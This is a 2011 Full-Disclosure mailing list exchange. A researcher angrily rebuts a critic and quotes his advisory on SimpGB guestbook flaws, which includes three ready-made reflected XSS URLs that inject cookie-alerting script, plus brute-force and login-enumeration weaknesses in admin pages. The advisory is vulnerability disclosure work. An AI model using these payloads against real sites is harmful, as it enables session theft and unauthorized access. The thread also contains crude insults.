Re: Multiple vulnerabilities in SimpGB

["MustLive" <mustlive () websecurity com ua>]

Hello Laurent!

You are very "intelligent" man, as I see from this and previous your letter
(in 2010).

You need to take into account the next:

1. I know better where to send.

2. If you write shitty stuff, then it doesn't mean that other do the same.

3. No need to think and state instead of other people - if it's not
interesting for you, then it can be interesting for others.

4. The main and obvious thing it's that I write all my advisories from 2006
for those people who are interested in them (and there are such people, as I
know for sure). So if you or anybody else is not interested in them, just
skip them (and don't need to write me nonsenses) - I'm writing my letters
not for you, but for others who is interested in them and who thanks me for
my work. It's strange that such "intelligent" man as you didn't understand
it for last five years :-).

5. I don't need any not serious letters from you, so don't waste your time
writing me anymore, because I've put your e-mail into blacklist. Spend your
time for good things.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: laurent gaffie
To: MustLive
Cc: full-disclosure () lists grok org uk ; bugtraq () securityfocus com
Sent: Wednesday, January 26, 2011 5:09 PM
Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB


Send your shitty stuff to bugtraq () securityfocus com

If it's not obvious, no one give a shit here, seriously.



2011/1/27 MustLive <mustlive () websecurity com ua>

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/